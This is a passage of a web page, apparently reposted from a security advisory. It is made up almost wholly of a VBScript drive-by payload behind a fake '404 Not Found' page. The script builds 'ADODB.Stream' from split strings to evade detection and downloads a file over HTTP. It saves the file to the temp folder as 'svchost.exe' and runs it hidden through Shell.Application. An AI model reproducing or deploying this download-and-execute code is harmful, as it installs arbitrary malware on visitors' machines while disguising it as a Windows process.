a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,”")
S.type = 1

‘ xml ajax req
str6=”GET”
x.Open str6, dl, False
x.Send

‘ Get temp directory and create our destination name
fname1=”svchost.exe”
set F = df.createobject(”Scripting.FileSystemObject”,”")
set tmp = F.GetSpecialFolder(2) ‘ Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
‘ open adodb stream and write contents of request to file
‘ like vbs dl+exec code
S.write x.responseBody
‘ Saves it with CreateOverwrite flag
S.savetofile fname1,2

S.close
set Q = df.createobject(”Shell.Application”,”")
Q.ShellExecute fname1,”",”",”open”,0
[/script]
[head]
[title][BL4CK] || 404 Not Found[/title]
[/head][body]
[center][embed xsrc=”" pluginspage=”" type=”application/x-shockwave-flash” width=”550″ height=”290″] [/embed]
[!– [script]location.href=’http://google.com’[/script] –]
[/body]
[/html]


via securiteam